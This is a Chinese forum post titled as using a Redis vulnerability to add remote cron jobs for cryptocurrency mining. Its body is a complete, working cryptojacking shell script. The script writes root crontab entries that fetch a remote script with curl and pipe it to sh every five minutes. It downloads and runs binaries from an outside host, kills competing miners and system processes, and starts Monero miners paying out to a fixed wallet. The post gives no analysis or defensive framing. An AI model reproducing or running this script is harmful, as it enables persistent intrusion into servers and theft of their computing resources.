butter7372 发表于 2018-11-4 09:31:43

利用redis漏洞远程添加计划任务挖取比特币

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin  
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0218 | sh" > /var/spool/cron/root
  
mkdir -p /var/spool/cron/crontabs
  
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0218 | sh" > /var/spool/cron/crontabs/root
  
if [ ! -f "/tmp/ddg.222" ]; then
  
curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.222
  
fi
  
chmod +x /tmp/ddg.222 && /tmp/ddg.222
  
CleanTail()
  
{
  
ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
  
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
  
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
  
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
  
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
  
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
  
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
  
}
  
DoYam()
  
{
  
if [ ! -f "/tmp/AnXqV.yam" ]; then
  
curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
  
fi
  
chmod +x /tmp/AnXqV.yam
  
/tmp/AnXqV.yam -c x -M stratum+tcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:x@xmr.crypto-pool.fr:443/xmr
  
}
  
DoMiner()
  
{
  
if [ ! -f "/tmp/AnXqV" ]; then
  
curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
  
fi
  
chmod +x /tmp/AnXqV
  
/tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
  
}
  
DoMinerNoAes()
  
{
  
if [ ! -f "/tmp/AnXqV.noaes" ]; then
  
curl -fsSL http://www.haveabitchin.com/minerd.noaes -o /tmp/AnXqV.noaes
  
fi
  
chmod +x /tmp/AnXqV.noaes
  
/tmp/AnXqV.noaes -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
  
}
  
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
  
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
  
ps auxf|grep -v grep|grep "AnXqV" || DoMiner
  
ps auxf|grep -v grep|grep "AnXqV" || DoYam
  
ps auxf|grep -v grep|grep "AnXqV" || DoMinerNoAes


页: [1]
查看完整版本: 利用redis漏洞远程添加计划任务挖取比特币